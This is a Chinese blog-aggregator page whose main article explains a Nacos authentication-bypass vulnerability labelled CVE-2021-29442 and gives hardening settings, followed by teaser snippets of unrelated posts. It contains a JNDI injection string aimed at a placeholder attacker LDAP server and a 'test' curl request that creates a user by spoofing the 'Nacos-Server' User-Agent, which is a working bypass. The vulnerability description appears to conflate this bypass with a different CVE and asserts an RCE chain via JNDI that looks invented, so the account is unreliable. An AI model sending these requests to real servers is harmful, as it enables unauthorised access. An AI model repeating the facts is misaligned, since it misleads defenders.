news 2026/4/3 5:16:38

Nacos CVE-2021-29442

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Nacos CVE-2021-29442

CVE-2021-29442 是 Nacos 中一个认证绕过 + 远程代码执行(RCE)的高危漏洞,主要影响 Nacos 1.4.1 及以下版本,漏洞的核心原因是:

  1. Nacos 默认的鉴权实现存在逻辑缺陷,攻击者可以通过构造特殊的 HTTP 请求头绕过身份认证;
  2. 结合 Nacos 的配置管理功能,攻击者可上传恶意配置文件,最终实现远程代码执行,控制服务器。
  • 受影响版本:Nacos 0.2.0 ~ 1.4.1
  • 不受影响版本:Nacos 1.4.2 及以上、2.0.0 及以上(官方已修复)
  • 漏洞触发条件:Nacos 开启了鉴权功能(nacos.core.auth.enabled=true),但未正确配置自定义密钥(默认密钥可被利用)。
  • 认证绕过:Nacos 的鉴权逻辑依赖User-Agent等请求头验证,攻击者构造包含Nacos-ServerUser-Agent即可绕过认证;
  • 配置注入:绕过认证后,攻击者通过 Nacos 的配置发布接口上传包含恶意脚本的配置(如${jndi:ldap://攻击者服务器/恶意类});
  • 代码执行:当客户端拉取该恶意配置时,触发 JNDI 注入,执行攻击者预设的恶意代码。
  • 1.x 版本升级至1.4.2及以上;
  • 2.x 版本使用2.0.0及以上(2.x 架构重构,从根本上修复了该漏洞)。
  • 修改默认密钥:在nacos/conf/application.properties中配置自定义的鉴权密钥,避免使用默认值:

E:\Document_Nacos\nacos-server-1.4.5\nacos\conf

# 开启鉴权

nacos.core.auth.enabled=true

# 配置自定义密钥(必须修改,随机字符串)

nacos.core.auth.plugin.nacos.token.secret.key=自定义的32位以上随机字符串

# 关闭 User-Agent 白名单(关键)

nacos.core.auth.enable.userAgentAuthWhite=false

測試:

curl -X POST "http://nacos服务器IP:8848/nacos/v1/auth/users?username=test&password=test" \ -H "User-Agent: Nacos-Server" \ -H "Content-Type: application/x-www-form-urlencoded"

  • CVE-2021-29442 是 Nacos 1.4.1 及以下版本的高危 RCE 漏洞,核心是认证绕过 + JNDI 注入;
  • 最根本的修复方式是升级 Nacos 到 1.4.2/2.0.0 及以上版本;
  • 临时防护需修改鉴权密钥、关闭 User-Agent 白名单,并做好网络隔离,禁止 Nacos 端口公网暴露

最早之前的springcloud,是用的Eureka的,后来某里发展出来的,一堆的抄着用。

nacos

其他开源国内git项目漏洞,这些都是等保过不去的,都是会被测试工具扫描出来,要通报批评的

kkFileView SSRF

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/1 18:31:52

YOLO目标检测保障真实抽烟场景的检测准确率错报警降低80%

基于 YOLO 的视觉检测算法,解决单帧检测中把 “笔放嘴边” 误判为 “抽烟” 并错误报警的问题,核心目标是通过算法升级降低这类场景的错报率。 结论: 核心解决思路:单帧误检的核心是“特征相似无上下文验证”,因此优先…

作者头像 李华
网站建设 2026/3/16 23:55:09

YOLO模型训练、评估与推理

引言 计算机视觉技术正席卷各行各业——从自动驾驶、安防系统到医疗影像和工业自动化,目标检测模型的性能直接决定了应用的落地效果。在众多模型中,YOLO(You Only Look Once)凭借“速度与精度兼顾”的特性脱颖而出。本文将深入解析…

作者头像 李华
网站建设 2026/3/29 18:27:23

流量一上来就崩?老实说,是你没提前想明白

流量一上来就崩?老实说,是你没提前想明白 ——聊聊如何防止流量突增把服务器直接送走 大家好,我是 Echo_Wish。 做运维、搞架构这么多年,我见过最“刺激”的场面,永远不是宕机本身,而是流量突然暴涨的那一刻。 你永远忘不了那种感觉: 监控曲线突然竖起来 📈 CPU 飙…

作者头像 李华
网站建设 2026/4/3 4:29:34

吉时利6517B 静电计/高阻表: 高精度电学测量的专业选择

156/2558/3328 产品概述:在电学测量领域,尤其是微弱电流与高阻抗测量中,仪器的精度、灵敏度与稳定性直接决定了科研与工业检测的可靠性。吉时利(Keithley)作为精密测量仪器领域的全球领导者,其推出的6517B静…

作者头像 李华
网站建设 2026/4/1 23:31:51

【课程设计/毕业设计】基于SpringBoot的闲置物品交易系统基于springboot的闲一品闲置品交易平台【附源码、数据库、万字文档】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/3/31 15:38:42

【2026亲测有效】10款免费降AI工具全解析,轻松将AIGC率降至10%以下

上个月,室友在提交论文时,用检测系统一查,结果显示“AI率87%”。这个数字在只剩几天就要二次提交的情况下,确实会让人非常焦虑。 为了解决这个问题,我花时间把市面上能找到的降ai率工具都试了一遍,前后测试…

作者头像 李华